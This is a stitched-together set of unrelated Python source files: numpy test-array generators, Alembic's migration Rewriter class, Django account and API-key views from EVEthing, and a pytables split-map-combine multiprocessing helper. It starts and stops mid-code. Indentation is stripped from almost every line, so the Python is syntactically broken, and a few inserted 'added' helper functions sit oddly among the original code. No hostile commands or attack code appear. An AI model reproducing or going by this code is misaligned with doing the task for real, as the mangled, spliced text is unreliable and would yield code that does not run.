yield np.array([2 ** 31], dtype=np.int64) # overflows on windows
for dtype in dtypes:
yield np.array([[1, 2], [3, 4]], dtype=dtype)[..., np.newaxis] # issue #183
# ties
for dtype in dtypes:
yield np.array([0, 0, 0], dtype=dtype)
yield np.array([1, 1, 1], dtype=dtype)
# 0d input
if not func_name.startswith("move"):
for dtype in dtypes:
yield np.array(-9, dtype=dtype)
yield np.array(0, dtype=dtype)
yield np.array(9, dtype=dtype)
if dtype in f_dtypes:
yield np.array(-inf, dtype=dtype)
yield np.array(inf, dtype=dtype)
yield np.array(nan, dtype=dtype)
# automate a bunch of arrays to test
ss = {}
ss[0] = {"size": 0, "shapes": [(0,), (0, 0), (2, 0), (2, 0, 1)]}
ss[1] = {"size": 8, "shapes": [(8,)]}
ss[2] = {"size": 12, "shapes": [(2, 6), (3, 4)]}
ss[3] = {"size": 16, "shapes": [(2, 2, 4)]}
ss[4] = {"size": 24, "shapes": [(1, 2, 3, 4)]}
for seed in (1, 2):
rs = np.random.RandomState(seed)
for ndim in ss:
size = ss[ndim]["size"]
shapes = ss[ndim]["shapes"]
for dtype in dtypes:
a = np.arange(size, dtype=dtype)
if issubclass(a.dtype.type, np.inexact):
if func_name not in ("nanargmin", "nanargmax"):
# numpy can't handle eg np.nanargmin([np.nan, np.inf])
idx = rs.rand(*a.shape) < 0.2
a[idx] = inf
idx = rs.rand(*a.shape) < 0.2
a[idx] = nan
idx = rs.rand(*a.shape) < 0.2
a[idx] *= -1
rs.shuffle(a)
for shape in shapes:
yield a.reshape(shape)
# non-contiguous arrays
for dtype in dtypes:
yield np.array([[1, 2], [3, 4]], dtype=dtype)[:, [1]] # gh 161
for dtype in dtypes:
# 1d
a = np.arange(12).astype(dtype)
for start in range(3):
for step in range(1, 3):
yield a[start::step] # don't use astype here; copy created
for dtype in dtypes:
# 2d
a = np.arange(12).reshape(4, 3).astype(dtype)
yield a[::2]
yield a[:, ::2]
yield a[::2][:, ::2]
for dtype in dtypes:
# 3d
a = np.arange(24).reshape(2, 3, 4).astype(dtype)
for start in range(2):
for step in range(1, 2):
yield a[start::step]
yield a[:, start::step]
yield a[:, :, start::step]
yield a[start::step][::2]
yield a[start::step][::2][:, ::2]
def array_order(a):
f = a.flags
string = []
if f.c_contiguous:
string.append("C")
if f.f_contiguous:
string.append("F")
if len(string) == 0:
string.append("N")
return ",".join(string)
| |
from typing import Any
from typing import Callable
from typing import Iterator
from typing import List
from typing import Type
from typing import TYPE_CHECKING
from typing import Union
from alembic import util
from alembic.operations import ops
if TYPE_CHECKING:
from alembic.operations.ops import AddColumnOp
from alembic.operations.ops import AlterColumnOp
from alembic.operations.ops import CreateTableOp
from alembic.operations.ops import MigrateOperation
from alembic.operations.ops import MigrationScript
from alembic.operations.ops import ModifyTableOps
from alembic.operations.ops import OpContainer
from alembic.runtime.migration import MigrationContext
from alembic.script.revision import Revision
class Rewriter:
"""A helper object that allows easy 'rewriting' of ops streams.
The :class:`.Rewriter` object is intended to be passed along
to the
:paramref:`.EnvironmentContext.configure.process_revision_directives`
parameter in an ``env.py`` script. Once constructed, any number
of "rewrites" functions can be associated with it, which will be given
the opportunity to modify the structure without having to have explicit
knowledge of the overall structure.
The function is passed the :class:`.MigrationContext` object and
    ``revision`` tuple that are passed to the
    :paramref:`.EnvironmentContext.configure.process_revision_directives`
    function normally,
and the third argument is an individual directive of the type
noted in the decorator. The function has the choice of returning
a single op directive, which normally can be the directive that
was actually passed, or a new directive to replace it, or a list
of zero or more directives to replace it.
.. seealso::
:ref:`autogen_rewriter` - usage example
"""
_traverse = util.Dispatcher()
_chained = None
def __init__(self) -> None:
self.dispatch = util.Dispatcher()
def chain(self, other: "Rewriter") -> "Rewriter":
"""Produce a "chain" of this :class:`.Rewriter` to another.
This allows two rewriters to operate serially on a stream,
e.g.::
writer1 = autogenerate.Rewriter()
writer2 = autogenerate.Rewriter()
@writer1.rewrites(ops.AddColumnOp)
def add_column_nullable(context, revision, op):
op.column.nullable = True
return op
@writer2.rewrites(ops.AddColumnOp)
def add_column_idx(context, revision, op):
idx_op = ops.CreateIndexOp(
'ixc', op.table_name, [op.column.name])
return [
op,
idx_op
]
writer = writer1.chain(writer2)
:param other: a :class:`.Rewriter` instance
:return: a new :class:`.Rewriter` that will run the operations
of this writer, then the "other" writer, in succession.
"""
wr = self.__class__.__new__(self.__class__)
wr.__dict__.update(self.__dict__)
wr._chained = other
return wr
def rewrites(
self,
operator: Union[
Type["AddColumnOp"],
Type["MigrateOperation"],
Type["AlterColumnOp"],
Type["CreateTableOp"],
Type["ModifyTableOps"],
],
) -> Callable:
"""Register a function as rewriter for a given type.
The function should receive three arguments, which are
the :class:`.MigrationContext`, a ``revision`` tuple, and
an op directive of the type indicated. E.g.::
@writer1.rewrites(ops.AddColumnOp)
def add_column_nullable(context, revision, op):
op.column.nullable = True
return op
"""
return self.dispatch.dispatch_for(operator)
def _rewrite(
self,
context: "MigrationContext",
revision: "Revision",
directive: "MigrateOperation",
) -> Iterator["MigrateOperation"]:
try:
_rewriter = self.dispatch.dispatch(directive)
except ValueError:
_rewriter = None
yield directive
else:
if self in directive._mutations:
yield directive
else:
for r_directive in util.to_list(
_rewriter(context, revision, directive), []
):
r_directive._mutations = r_directive._mutations.union(
[self]
)
yield r_directive
def __call__(
self,
context: "MigrationContext",
revision: "Revision",
directives: List["MigrationScript"],
) -> None:
self.process_revision_directives(context, revision, directives)
if self._chained:
self._chained(context, revision, directives)
@_traverse.dispatch_for(ops.MigrationScript)
def _traverse_script(
self,
context: "MigrationContext",
revision: "Revision",
directive: "MigrationScript",
) -> None:
upgrade_ops_list = []
for upgrade_ops in directive.upgrade_ops_list:
ret = self._traverse_for(context, revision, upgrade_ops)
if len(ret) != 1:
raise ValueError(
"Can only return single object for UpgradeOps traverse"
)
upgrade_ops_list.append(ret[0])
directive.upgrade_ops = upgrade_ops_list
downgrade_ops_list = []
for downgrade_ops in directive.downgrade_ops_list:
ret = self._traverse_for(context, revision, downgrade_ops)
if len(ret) != 1:
raise ValueError(
"Can only return single object for DowngradeOps traverse"
)
downgrade_ops_list.append(ret[0])
directive.downgrade_ops = downgrade_ops_list
@_traverse.dispatch_for(ops.OpContainer)
def _traverse_op_container(
self,
context: "MigrationContext",
revision: "Revision",
directive: "OpContainer",
) -> None:
self._traverse_list(context, revision, directive.ops)
@_traverse.dispatch_for(ops.MigrateOperation)
def _traverse_any_directive(
self,
context: "MigrationContext",
revision: "Revision",
directive: "MigrateOperation",
) -> None:
pass
def _traverse_for(
self,
context: "MigrationContext",
revision: "Revision",
directive: "MigrateOperation",
) -> Any:
directives = list(self._rewrite(context, revision, directive))
for directive in directives:
traverser = self._traverse.dispatch(directive)
traverser(self, context, revision, directive)
return directives
def _traverse_list(
self,
context: "MigrationContext",
revision: "Revision",
directives: Any,
) -> None:
dest = []
for directive in directives:
dest.extend(self._traverse_for(context, revision, directive))
directives[:] = dest
def process_revision_directives(
self,
context: "MigrationContext",
revision: "Revision",
directives: List["MigrationScript"],
) -> None:
self._traverse_list(context, revision, directives)
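def _example_env_py_wiring(context, connection, target_metadata):
    # Hedged usage sketch (added; not part of Alembic itself): wires a
    # Rewriter into EnvironmentContext.configure inside an env.py
    # script, as the class docstring above describes.
    writer = Rewriter()
    @writer.rewrites(ops.AddColumnOp)
    def add_column_nullable(ctx, revision, op):
        op.column.nullable = True
        return op
    context.configure(
        connection=connection,
        target_metadata=target_metadata,
        process_revision_directives=writer,
    )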
| |
# ------------------------------------------------------------------------------
# Copyright (c) 2010-2013, EVEthing team
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
# ------------------------------------------------------------------------------
import gzip
from cStringIO import StringIO
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.http import HttpResponseForbidden
from django.shortcuts import redirect, render
from django.views.decorators.debug import sensitive_post_parameters, sensitive_variables
from django.contrib.auth.forms import UserCreationForm
from core.util import get_minimum_keyid
from thing.forms import UploadSkillPlanForm
from thing.models import * # NOPEP8
from thing.stuff import * # NOPEP8
@login_required
def account(request):
"""Account management view"""
if 'message' in request.session:
message = request.session.pop('message')
message_type = request.session.pop('message_type')
else:
message = None
message_type = None
profile = request.user.profile
characters = Character.objects.filter(apikeys__user=request.user).distinct()
home_hide_characters = set(int(c) for c in profile.home_hide_characters.split(',') if c)
return render_page(
'thing/account.html',
{
'message': message,
'message_type': message_type,
'profile': profile,
'home_chars_per_row': (2, 3, 4, 6),
'home_sort_orders': UserProfile.HOME_SORT_ORDERS,
'characters': characters,
'home_hide_characters': home_hide_characters,
'themes': settings.THEMES,
'apikeys': APIKey.objects.filter(user=request.user).order_by('-valid', 'key_type', 'name'),
'skillplans': SkillPlan.objects.filter(user=request.user),
'visibilities': SkillPlan.VISIBILITY_CHOICES,
'disable_password': getattr(settings, 'DISABLE_ACCOUNT_PASSWORD', False)
},
request,
[c.id for c in characters],
)
@sensitive_post_parameters()
@sensitive_variables()
@login_required
def account_change_password(request):
"""Change password"""
old_password = request.POST['old_password']
new_password = request.POST['new_password']
confirm_password = request.POST['confirm_password']
# Password checks out ok
if request.user.check_password(old_password):
# New passwords match
if new_password == confirm_password:
# Length seems ok
if len(new_password) >= 4:
request.session['message_type'] = 'success'
request.session['message'] = 'Password changed successfully.'
request.user.set_password(new_password)
request.user.save()
# Too short
else:
request.session['message_type'] = 'error'
request.session['message'] = 'Password must be at least 4 characters long!'
# Passwords don't match
else:
request.session['message_type'] = 'error'
request.session['message'] = 'New passwords do not match!'
# Old password is incorrect
else:
request.session['message_type'] = 'error'
request.session['message'] = 'Old password is incorrect!'
return redirect('%s#password' % (reverse(account)))
@login_required
def account_settings(request):
profile = request.user.profile
theme = request.POST.get('theme', 'theme-default')
if [t for t in settings.THEMES if t[0] == theme]:
profile.theme = theme
profile.show_clock = (request.POST.get('show_clock', '') == 'on')
profile.show_assets = (request.POST.get('show_assets', '') == 'on')
profile.show_blueprints = (request.POST.get('show_blueprints', '') == 'on')
profile.show_contracts = (request.POST.get('show_contracts', '') == 'on')
profile.show_industry = (request.POST.get('show_industry', '') == 'on')
profile.show_orders = (request.POST.get('show_orders', '') == 'on')
profile.show_trade = (request.POST.get('show_trade', '') == 'on')
profile.show_transactions = (request.POST.get('show_transactions', '') == 'on')
profile.show_wallet_journal = (request.POST.get('show_wallet_journal', '') == 'on')
profile.show_pi = (request.POST.get('show_pi', '') == 'on')
profile.show_item_icons = (request.POST.get('show_item_icons', '') == 'on')
entries_per_page = request.POST.get('entries_per_page', '100')
if entries_per_page not in ('100', '200', '300', '400', '500'):
entries_per_page = '100'
profile.entries_per_page = entries_per_page
    home_chars_per_row = int(request.POST.get('home_chars_per_row', 0))
if home_chars_per_row in (2, 3, 4, 6):
profile.home_chars_per_row = home_chars_per_row
home_sort_order = request.POST.get('home_sort_order')
if [o for o in UserProfile.HOME_SORT_ORDERS if o[0] == home_sort_order]:
profile.home_sort_order = home_sort_order
profile.home_sort_descending = (request.POST.get('home_sort_descending', '') == 'on')
profile.home_show_locations = (request.POST.get('home_show_locations', '') == 'on')
profile.home_show_separators = (request.POST.get('home_show_separators', '') == 'on')
profile.home_highlight_backgrounds = (request.POST.get('home_highlight_backgrounds', '') == 'on')
profile.home_highlight_borders = (request.POST.get('home_highlight_borders', '') == 'on')
profile.home_show_security = (request.POST.get('home_show_security', '') == 'on')
# hide characters
profile.home_hide_characters = ','.join(c for c in request.POST.getlist('home_hide_characters') if c.isdigit())
profile.save()
request.session['message_type'] = 'success'
request.session['message'] = 'Settings changed successfully.'
return redirect(account)
@login_required
def account_apikey_add(request):
"""Add an API key"""
keyid = request.POST.get('keyid', '0')
vcode = request.POST.get('vcode', '').strip()
name = request.POST.get('name', '')
group_name = request.POST.get('group_name', '')
if not keyid.isdigit():
request.session['message_type'] = 'error'
request.session['message'] = 'KeyID is not an integer!'
elif int(keyid) < 1 or int(keyid) > 2 ** 31:
request.session['message_type'] = 'error'
request.session['message'] = 'Invalid KeyID!'
elif len(vcode) != 64:
request.session['message_type'] = 'error'
request.session['message'] = 'vCode must be 64 characters long!'
elif int(keyid) < get_minimum_keyid():
request.session['message_type'] = 'error'
request.session['message'] = 'This key was created more than 30 minutes ago, make a new one for each app!'
else:
if request.user.profile.can_add_keys is False:
request.session['message_type'] = 'error'
request.session['message'] = 'You are not allowed to add API keys!'
elif APIKey.objects.filter(user=request.user, keyid=request.POST.get('keyid', 0)).count():
request.session['message_type'] = 'error'
request.session['message'] = 'You already have an API key with that KeyID!'
else:
apikey = APIKey(
user_id=request.user.id,
keyid=keyid,
vcode=vcode,
name=name,
group_name=group_name,
)
apikey.save()
request.session['message_type'] = 'success'
request.session['message'] = 'API key added successfully!'
return redirect('%s#apikeys' % (reverse(account)))
@login_required
def account_apikey_delete(request):
"""Delete an API key"""
apikey_id = request.POST.get('apikey_id', '')
if apikey_id.isdigit():
try:
apikey = APIKey.objects.get(user=request.user.id, id=apikey_id)
except APIKey.DoesNotExist:
request.session['message_type'] = 'error'
request.session['message'] = 'You do not have an API key with that KeyID!'
else:
request.session['message_type'] = 'success'
request.session['message'] = 'API key %s deleted successfully!' % (apikey.id)
apikey.delete()
else:
request.session['message_type'] = 'error'
request.session['message'] = 'You seem to be doing silly things, stop that.'
return redirect('%s#apikeys' % (reverse(account)))
@login_required
def account_apikey_edit(request):
"""Edit an API key"""
try:
apikey = APIKey.objects.get(user=request.user.id, id=request.POST.get('apikey_id', '0'))
except APIKey.DoesNotExist:
request.session['message_type'] = 'error'
request.session['message'] = 'You do not have an API key with that KeyID!'
else:
request.session['message_type'] = 'success'
request.session['message'] = 'API key %s edited successfully!' % apikey.id
apikey_name = request.POST.get('name', '')
apikey_group_name = request.POST.get('group_name', '')
dont_edit = request.POST.get('dont_edit', '')
if apikey.name != apikey_name and dont_edit != 'name':
apikey.name = apikey_name
apikey.save()
elif apikey.group_name != apikey_group_name and dont_edit != 'group_name':
apikey.group_name = apikey_group_name
apikey.save()
return redirect('%s#apikeys' % (reverse(account)))
@login_required
def account_apikey_purge(request):
"""Purge an API key's data"""
apikey_id = request.POST.get('apikey_id', '')
if apikey_id.isdigit():
try:
apikey = APIKey.objects.get(user=request.user.id, id=apikey_id)
except APIKey.DoesNotExist:
request.session['message_type'] = 'error'
request.session['message'] = 'You do not have an API key with that KeyID!'
else:
request.session['message_type'] = 'success'
request.session['message'] = 'API key %s purge queued successfully!' % (apikey.id)
apikey.purge_data()
else:
request.session['message_type'] = 'error'
request.session['message'] = 'You seem to be doing silly things, stop that.'
return redirect('%s#apikeys' % (reverse(account)))
@login_required
def account_skillplan_add(request):
"""Add a skillplan"""
if request.method == 'POST':
form = UploadSkillPlanForm(request.POST, request.FILES)
if form.is_valid():
_handle_skillplan_upload(request)
return redirect('%s#skillplans' % (reverse(account)))
else:
request.session['message_type'] = 'error'
request.session['message'] = 'Form validation failed!'
else:
request.session['message_type'] = 'error'
request.session['message'] = "That doesn't look like a POST request!"
return redirect('%s#skillplans' % (reverse(account)))
@login_required
def account_skillplan_delete(request):
"""Delete a skillplan"""
skillplan_id = request.POST.get('skillplan_id', '')
if skillplan_id.isdigit():
try:
skillplan = SkillPlan.objects.get(user=request.user, id=skillplan_id)
except SkillPlan.DoesNotExist:
request.session['message_type'] = 'error'
request.session['message'] = 'You do not own that skill plan!'
else:
request.session['message_type'] = 'success'
request.session['message'] = 'Skill plan "%s" deleted successfully!' % (skillplan.name)
# Delete all of the random things for this skillplan
entries = SPEntry.objects.filter(skill_plan=skillplan)
SPRemap.objects.filter(pk__in=[e.sp_remap_id for e in entries if e.sp_remap_id]).delete()
SPSkill.objects.filter(pk__in=[e.sp_skill_id for e in entries if e.sp_skill_id]).delete()
entries.delete()
skillplan.delete()
else:
request.session['message_type'] = 'error'
request.session['message'] = 'You seem to be doing silly things, stop that.'
return redirect('%s#skillplans' % (reverse(account)))
@login_required
def account_skillplan_edit(request):
"""Edit a skillplan"""
skillplan_id = request.POST.get('skillplan_id', '')
if skillplan_id.isdigit():
try:
skillplan = SkillPlan.objects.get(user=request.user, id=skillplan_id)
except SkillPlan.DoesNotExist:
request.session['message_type'] = 'error'
request.session['message'] = 'You do not own that skill plan!'
else:
skillplan.name = request.POST['name']
skillplan.visibility = request.POST['visibility']
skillplan.save()
request.session['message_type'] = 'success'
request.session['message'] = 'Skill plan "%s" edited successfully!' % (skillplan.name)
else:
request.session['message_type'] = 'error'
request.session['message'] = 'You seem to be doing silly things, stop that.'
return redirect('%s#skillplans' % (reverse(account)))
def _handle_skillplan_upload(request):
name = request.POST['name'].strip()
uf = request.FILES['file']
visibility = request.POST['visibility']
# Check that this name is unique for the user
if SkillPlan.objects.filter(user=request.user, name=name).count() > 0:
request.session['message_type'] = 'error'
request.session['message'] = "You already have a skill plan with that name!"
return
# Check file size, 10KB should be more than large enough
if uf.size > 10240:
request.session['message_type'] = 'error'
request.session['message'] = "That file is too large!"
return
data = StringIO(uf.read())
# Try opening it as a gzip file
gf = gzip.GzipFile(fileobj=data)
try:
data = gf.read()
except IOError:
request.session['message_type'] = 'error'
request.session['message'] = "That doesn't look like a .EMP file!"
return
# Make sure it's valid XML
try:
root = ET.fromstring(data)
except ET.ParseError:
request.session['message_type'] = 'error'
request.session['message'] = "That doesn't look like a .EMP file!"
return
# FINALLY
skillplan = SkillPlan.objects.create(
user=request.user,
name=name,
visibility=visibility,
)
_parse_emp_plan(skillplan, root)
request.session['message_type'] = 'success'
request.session['message'] = "Skill plan uploaded successfully."
def _parse_emp_plan(skillplan, root):
entries = []
position = 0
seen = {}
for entry in root.findall('entry'):
# Create the various objects for the remapping if it exists
remapping = entry.find('remapping')
if remapping is not None:
# <remapping status="UpToDate" per="17" int="27" mem="21" wil="17" cha="17" description="" />
spr = SPRemap.objects.create(
int_stat=remapping.attrib['int'],
mem_stat=remapping.attrib['mem'],
per_stat=remapping.attrib['per'],
wil_stat=remapping.attrib['wil'],
cha_stat=remapping.attrib['cha'],
)
entries.append(SPEntry(
skill_plan=skillplan,
position=position,
sp_remap=spr,
))
position += 1
# Grab some data we'll need
skillID = int(entry.attrib['skillID'])
level = int(entry.attrib['level'])
priority = int(entry.attrib['priority'])
# Get prereqs for this skill
prereqs = Skill.get_prereqs(skillID)
# Add any missing prereq skills
for pre_skill_id, pre_level in prereqs:
for i in range(seen.get(pre_skill_id, 0) + 1, pre_level + 1):
try:
sps = SPSkill.objects.create(
skill_id=pre_skill_id,
level=i,
priority=priority,
)
                except Exception:
continue
entries.append(SPEntry(
skill_plan=skillplan,
position=position,
sp_skill=sps,
))
position += 1
seen[pre_skill_id] = i
# Add the actual skill
for i in range(seen.get(skillID, 0) + 1, level + 1):
try:
sps = SPSkill.objects.create(
skill_id=skillID,
level=i,
priority=priority,
)
            except Exception:
continue
entries.append(SPEntry(
skill_plan=skillplan,
position=position,
sp_skill=sps,
))
position += 1
seen[skillID] = i
SPEntry.objects.bulk_create(entries)
def account_register(request):
"""Register Account"""
if not settings.ALLOW_REGISTRATION:
return HttpResponseForbidden()
if request.user.is_authenticated():
return redirect(reverse('home'))
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
return redirect(reverse('home'))
else:
form = UserCreationForm()
return render(request, "registration/register.html", {
'form': form,
})
| |
''' Implements the often needed split, map, combine paradigm '''
from __future__ import division
import os
import shutil
import tempfile
from collections import Iterable
from multiprocessing import Pool, cpu_count
import dill
import numpy as np
import tables as tb
def apply_async(pool, fun, args=None, **kwargs):
    ''' Run fun(*args, **kwargs) in a different process.
    fun can be a complex function, since pickling is not done with the
    cPickle module as multiprocessing.apply_async would do, but with
    the more powerful dill serialization. Both positional args and
    keyword kwargs can be passed through.'''
payload = dill.dumps((fun, args, kwargs))
return pool.apply_async(_run_with_dill, (payload,))
def _run_with_dill(payload):
''' Unpickle payload with dill.
The payload is the function plus arguments and keyword arguments.
'''
fun, args, kwargs = dill.loads(payload)
if args:
return fun(*args, **kwargs)
else:
return fun(**kwargs)
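def _example_apply_async():
    ''' Hedged usage sketch (added): dill lets apply_async() ship a
    lambda to a worker process, which the cPickle-based
    Pool.apply_async would refuse to serialize. '''
    pool = Pool(2)
    result = apply_async(pool, lambda x, y: x + y, args=(1,), y=2)
    pool.close()
    pool.join()
    return result.get()  # -> 1 + 2 = 3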
class SMC(object):
def __init__(self, table_file_in, file_out,
func, func_kwargs={}, node_desc={}, table=None,
align_at=None, n_cores=None, chunk_size=1000000):
''' Apply a function to a pytable on multiple cores in chunks.
Parameters
----------
table_file_in : string
File name of the file with the table.
file_out : string
File name with the resulting table/histogram.
func : function
Function to be applied on table chunks.
func_kwargs : dict
Additional kwargs to pass to worker function
node_desc : dict
Output table/array parameters for pytables. Can be empty.
Name/Filters/Title values are deduced from the input table
if not defined. Data type is deduced from resulting data
format if not defined.
Example:
                node_desc = {'name': 'test'}
            This would create an output node named 'test', with the title
            and filters taken from the input table and the data type
            deduced from the calculated data.
table : string, iterable of strings, None
string: Table name. Needed if multiple tables exists in file.
iterable of strings: possible table names. First existing table
is used
None: only table is used independent of name. If multiple
tables exist exception is raised
align_at : string, None
If specified align chunks at this column values
n_cores : integer, None
How many cores to use. If None use all available cores.
            If 1, multiprocessing is disabled; useful for debugging.
chunk_size : int
Chunk size of the data when reading from file.
Notes:
------
        It follows the split, map, combine paradigm:
        - split: data is split into chunks for multiple processes for
          a speed increase
- map: the function is called on each chunk. If the chunk per core
is still too large to fit in memory it is chunked further. The
result is written to a table per core.
- combine: the tables are merged into one result table or one
result histogram depending on the output data format
'''
# Set parameters
self.table_file_in = table_file_in
self.file_out = file_out
self.n_cores = n_cores
self.align_at = align_at
self.func = func
self.node_desc = node_desc
self.chunk_size = chunk_size
self.func_kwargs = func_kwargs
if self.align_at and self.align_at != 'event_number':
raise NotImplementedError('Data alignment is only supported '
'on event_number')
# Get the table node name
with tb.open_file(table_file_in) as in_file:
if not table: # Find the table node
tables = in_file.list_nodes('/', classname='Table') # get all nodes of type 'table'
if len(tables) == 1: # if there is only one table, take this one
self.node_name = tables[0].name
else: # Multiple tables
raise RuntimeError('No table node defined and multiple table nodes found in file')
elif isinstance(table, (list, tuple, set)): # possible names
self.node_name = None
for node_cand in table:
try:
in_file.get_node(in_file.root, node_cand)
self.node_name = node_cand
except tb.NoSuchNodeError:
pass
if not self.node_name:
                    raise RuntimeError('No table nodes with names %s found' % str(table))
else: # string
self.node_name = table
node = in_file.get_node(in_file.root, self.node_name)
# Set number of rows
self.n_rows = node.shape[0]
# Set output parameters from input if not defined
self.node_desc.setdefault('filters', node.filters)
self.node_desc.setdefault('name', node.name)
self.node_desc.setdefault('title', node.title)
if not self.n_cores: # Set n_cores to maximum cores available
self.n_cores = cpu_count()
        # Deactivate multiprocessing for small data sets
        # Overhead of pools can make multiprocessing slower
if self.n_rows < 2. * self.chunk_size:
self.n_cores = 1
# The three main steps
self._split()
self._map()
self._combine()
def _split(self):
self.start_i, self.stop_i = self._get_split_indeces()
assert len(self.start_i) == len(self.stop_i)
def _map(self):
chunk_size_per_core = int(self.chunk_size / self.n_cores)
if self.n_cores == 1:
self.tmp_files = [self._work(self.table_file_in,
self.node_name,
self.func,
self.func_kwargs,
self.node_desc,
self.start_i[0],
self.stop_i[0],
chunk_size_per_core)]
else:
# Run function in parallel
pool = Pool(self.n_cores)
jobs = []
for i in range(self.n_cores):
job = apply_async(pool=pool,
fun=self._work,
table_file_in=self.table_file_in,
node_name=self.node_name,
func=self.func,
func_kwargs=self.func_kwargs,
node_desc=self.node_desc,
start_i=self.start_i[i],
stop_i=self.stop_i[i],
chunk_size=chunk_size_per_core
)
jobs.append(job)
# Gather results
self.tmp_files = []
for job in jobs:
self.tmp_files.append(job.get())
pool.close()
pool.join()
del pool
def _work(self, table_file_in, node_name, func, func_kwargs,
node_desc, start_i, stop_i, chunk_size):
''' Defines the work per worker.
Reads data, applies the function and stores data in chunks into a table
or a histogram.
'''
with tb.open_file(table_file_in, 'r') as in_file:
node = in_file.get_node(in_file.root, node_name)
output_file = tempfile.NamedTemporaryFile(delete=False, dir=os.getcwd())
with tb.open_file(output_file.name, 'w') as out_file:
# Create result table with specified data format
# From given pytables tables description
if 'description' in node_desc:
table_out = out_file.create_table(out_file.root,
**node_desc)
# Data format unknown and has to be determined later
# and thus the table has to be created later
else:
table_out = None
# Create result histogram
hist_out = None
for data, _ in self._chunks_at_event(table=node,
start_index=start_i,
stop_index=stop_i,
chunk_size=chunk_size):
data_ret = func(data, **func_kwargs)
# Create table if not existing
# Extract table description from returned data
if not table_out:
if data_ret.dtype.names: # Recarray thus table needed
dcr = data_ret.dtype
table_out = out_file.create_table(out_file.root,
description=dcr,
**node_desc)
# Create histogram if data is not a table
elif hist_out is None:
# Copy needed for reshape
hist_out = data_ret.copy()
continue
if table_out is not None:
table_out.append(data_ret) # Tables are appended
else:
# Check if array needs to be enlarged
shape = []
# Loop over dimension
for i in range(len(hist_out.shape)):
if hist_out.shape[i] < data_ret.shape[i]:
shape.append(data_ret.shape[i])
else:
shape.append(hist_out.shape[i])
hist_out.resize(shape)
# Add array, ignore size
data_ret.resize(hist_out.shape)
hist_out += data_ret
if hist_out is not None:
# Store histogram to file
dt = hist_out.dtype
out = out_file.create_carray(out_file.root,
atom=tb.Atom.from_dtype(dt),
shape=hist_out.shape,
**node_desc)
out[:] = hist_out
return output_file.name
def _combine(self):
# Try to set output node name if defined
try:
node_name = self.node_desc['name']
except KeyError:
# Output node name set to input node name
node_name = self.node_name
# Check data type to decide on combine procedure
data_type = 'table'
with tb.open_file(self.tmp_files[0], 'r') as in_file:
node = in_file.get_node(in_file.root, node_name)
if type(node) is tb.carray.CArray:
data_type = 'array'
if data_type == 'table':
# Use first tmp file as result file
shutil.move(self.tmp_files[0], self.file_out)
with tb.open_file(self.file_out, 'r+') as out_file:
node = out_file.get_node(out_file.root, node_name)
for f in self.tmp_files[1:]:
with tb.open_file(f) as in_file:
tmp_node = in_file.get_node(in_file.root, node_name)
for i in range(0, tmp_node.shape[0], self.chunk_size):
node.append(tmp_node[i: i + self.chunk_size])
os.remove(f)
else: # TODO: solution without having all hists in RAM
# Only one file, merging not needed
if len(self.tmp_files) == 1:
shutil.move(self.tmp_files[0], self.file_out)
else: # Several files, merge them by adding up
with tb.open_file(self.file_out, 'w') as out_file:
hist_data = None
for f in self.tmp_files:
with tb.open_file(f) as in_file:
tmp_data = in_file.get_node(in_file.root, node_name)[:]
if hist_data is None:
# Copy needed for reshape
hist_data = tmp_data.copy()
else:
# Check if array needs to be enlarged
shape = []
# Loop over dimension
for i in range(len(hist_data.shape)):
if hist_data.shape[i] < tmp_data.shape[i]:
shape.append(tmp_data.shape[i])
else:
shape.append(hist_data.shape[i])
hist_data.resize(shape)
# Add array, ignore size
tmp_data.resize(hist_data.shape)
hist_data += tmp_data
os.remove(f)
dt = hist_data.dtype
out = out_file.create_carray(out_file.root,
atom=tb.Atom.from_dtype(dt),
shape=hist_data.shape,
**self.node_desc)
out[:] = hist_data
def _get_split_indeces(self):
''' Calculates the data range for each core.
        Return two lists with start/stop indices.
        Stop indices are exclusive.
'''
core_chunk_size = self.n_rows // self.n_cores
start_indeces = list(range(0,
self.n_rows,
core_chunk_size)
[:self.n_cores])
if not self.align_at:
stop_indeces = start_indeces[1:]
else:
stop_indeces = self._get_next_index(start_indeces)
start_indeces = [0] + stop_indeces
stop_indeces.append(self.n_rows) # Last index always table size
assert len(stop_indeces) == self.n_cores
assert len(start_indeces) == self.n_cores
return start_indeces, stop_indeces
def _get_next_index(self, indeces):
''' Get closest index where the alignment column changes '''
next_indeces = []
for index in indeces[1:]:
with tb.open_file(self.table_file_in) as in_file:
node = in_file.get_node(in_file.root, self.node_name)
values = node[index:index + self.chunk_size][self.align_at]
value = values[0]
for i, v in enumerate(values):
if v != value:
next_indeces.append(index + i)
break
value = v
return next_indeces
def _chunks_at_event(self, table, start_index=None, stop_index=None,
chunk_size=1000000):
        '''Takes a table with an event_number column and returns chunks.
        The chunks are chosen in a way that events are not split.
        Start and stop indices limiting the table size can be specified
        to improve performance. The event_number column must be sorted.
Parameters
----------
table : pytables.table
The data.
start_index : int
Start index of data. If None, no limit is set.
stop_index : int
Stop index of data. If None, no limit is set.
chunk_size : int
Maximum chunk size per read.
Returns
-------
Iterator of tuples
